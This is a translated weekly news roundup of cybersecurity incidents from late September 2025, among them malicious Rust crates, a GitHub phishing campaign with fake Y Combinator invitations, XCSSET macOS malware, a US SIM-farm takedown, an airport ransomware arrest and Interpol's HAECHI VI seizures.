Атака на разработчиков: фишинговые схемы и угроза SIM-ферм в мире кибербезопасности Translation: Headline: Attacks on Developers: Phishing Schemes and the Threat of SIM Farms in the Cybersecurity World

We have compiled the most significant cybersecurity news from the past week.

Two malicious packages in the official Rust programming language repository were scanning developers’ devices with the intent to steal cryptocurrency and sensitive information. Since May 25, 2025, they had been downloaded 8,424 times. This was reported on September 24 by researchers from Socket, a security analysis firm.

The malware, named faster_log and async_println, spread through the Crates.io registry, which is the equivalent of npm for JavaScript. They impersonated the legitimate package fast_log by copying its README file and repository metadata while retaining the logging function to avoid suspicion.

The malware scanned the victim’s environment and the project’s source files for specific elements. Upon finding matches, it exfiltrated data to an encoded URL.

On the day of notification, the platform removed the fake packages and blocked the fraudsters’ accounts.

A large-scale phishing campaign targeted GitHub users through cryptocurrency drainers that infiltrated via fake invitations to participate in the Y Combinator startup support program.

On September 24, BleepingComputer reported that the attackers exploited flaws in the notification system to deliver fraudulent messages. They created tasks in several repositories and tagged their targets.

Mentioning a user’s account name in tasks automatically triggers a notification from GitHub. Since the email comes from a legitimate source, it lands directly in the recipients’ inboxes.

As bait, an invitation was sent to apply for an upcoming funding round at Y Combinator, offering $15 million. In some repositories, up to 500 tasks were opened by an account created just a week prior.

The recipients were prompted to click on a phishing link. The fake domain contained an almost imperceptible error («l» instead of «i»). Clicking on the link executed a JavaScript that prompted users to verify their crypto wallet. Signing this would initiate malicious transactions that drained their accounts.

Following complaints to GitHub, the IC3, and Google Safe Browsing, the fraudulent repositories were removed.

On September 25, Microsoft Threat Intelligence specialists discovered a new variant of the XCSSET malware for macOS, designed to steal notes, cryptocurrencies, and browser data from infected devices. It spreads by searching for and infecting other projects within the Xcode developer environment, launching during product builds.

“We believe this method of infection and spread is based on file sharing between developers creating applications for Apple or macOS,” the experts stated in their report.

Researchers noted several changes in the new version of the stealer.

On September 23, the U.S. Secret Service announced that they had uncovered and dismantled the largest SIM farm in the nation’s history during an operation.

According to The New York Times, the investigation began after anonymous threats were directed at high-profile officials at the beginning of the year. Victims included two White House employees and one Secret Service officer.

During the operation, over 300 integrated SIM servers and 100,000 SIM cards were seized. The farm operated 56 km from the UN headquarters, where a General Assembly meeting with global leaders was taking place. Authorities managed to neutralize the farm just hours before the meeting.

The farm had the capacity to send spam to nearly every phone number in the U.S. within minutes and could disrupt the entire national telecommunications system.

During the investigation, officers found empty conspiracy apartments rented in Armonk (New York), Greenwich (Connecticut), Queens (New York), and New Jersey. Agents also seized firearms, computers, mobile phones, and 80 grams of cocaine.

On September 24, a suspect in the distribution of ransomware that caused extensive disruptions in European airport systems was arrested.

Law enforcement stated that the arrest was made following an investigation into a cyberattack affecting the Multi-User System Environment (MUSE) software by Collins Aerospace. The suspect has been released on bail pending the investigation.

The attack was detected on Friday, September 19, when reports of flight delays began to emerge. Affected transportation hubs included London Heathrow, Brussels Airport, Dublin Airport, and Berlin’s Willy Brandt Airport, among others.

In an international operation led by Interpol, law enforcement seized over $439 million in cash and cryptocurrency. Authorities believe the confiscated funds are connected to cybercrimes that have victimized thousands around the globe.

Operation HAECHI VI was conducted from April to August with involvement from authorities in 40 countries. Investigators arrested 400 cryptocurrency wallets and blocked over 68,000 related bank accounts, seizing around $16 million in cryptocurrency.

As part of the operation, 45 suspects involved in unauthorized access to social security accounts were arrested in Portugal. Additionally, the Royal Thai Police seized $6.6 million transferred by an unnamed Japanese corporation to accounts controlled by a transnational criminal group composed of individuals from Thailand and West Africa.